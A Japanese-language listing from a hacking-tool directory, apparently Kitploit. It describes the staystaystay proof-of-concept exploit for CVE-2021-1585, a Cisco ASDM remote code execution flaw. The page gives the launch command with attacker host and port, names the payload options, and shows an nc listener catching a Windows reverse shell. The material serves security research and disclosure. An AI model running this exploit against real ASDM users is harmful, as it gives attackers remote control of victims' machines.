Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/jbaines-r7/staystaystay
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubjbaines-r7/staystaystay

staystaystay

CVE-2021-1585 の概念実証: Cisco ASA Device Manager RCE

リポジトリを見る
1344年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

staystaystay

staystaystay は、CVE-2021-1585 の概念実証エクスプロイトです。これは、Cisco ASA Device Manager (ASDM) に影響する中間者攻撃または悪意のあるエンドポイントによる RCE の問題です。この問題は元々 Malcolm Lashley によって発見され、2021 年の夏に公開されました。ただし、私がこれを調査していた時点では、最新バージョン (ASDM 7.17(1)) にはパッチが適用されておらず、私は独自にこの問題にたどり着きました。

Cisco は ASDM 7.18(1.152) でこれを「修正」しました。このエクスプロイトが依然として問題なく動作するため、私が「修正」と言うのはそういう意味です。ユーザーは「はい」をクリックするだけで済みます。以下のビデオを参照してください。

攻撃者は、被害者へのリバースシェルを取得するために、次の 2 種類のペイロードを構成できます。

  • jjs.exe ベース (ファイルがディスクに書き込まれる - これは最近 Windows Defender に検出されています)
  • Longtime Sunshine ベース

被害者が自分の ASDM を staystaystay に接続すると、構成されたペイロードが注入され、リバースシェルが生成されます。jjs リバースシェルは、標準的な nc リスナー (必要に応じて Metasploit でも) で受け取ることができます。Longtime Sunshine オプションを使用するには、攻撃者がそのフレームワークを使用する必要があります。

例として、次のコマンドは jjs ペイロードを使用してポート 8443 で staystaystay を起動します。

root@kitploit:~
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

被害者が 8443 に接続すると、10.0.0.2:1270 へのリバースシェルが生成されます。

root@kitploit:~
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

次のビデオには、Longtime Sunshine を使用したエクスプロイトの例が含まれています。

  • https://www.youtube.com/watch?v=07VO2JGTWR8

次のビデオは、パッチ適用済みバージョンに対する攻撃を示しています。

  • https://www.youtube.com/watch?v=ySgbHClk9HE

AttackerKB の記事はこちらにあります。

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

クレジット

  • Taylor Swift - アコースティック・バージョン
ツールをダウンロード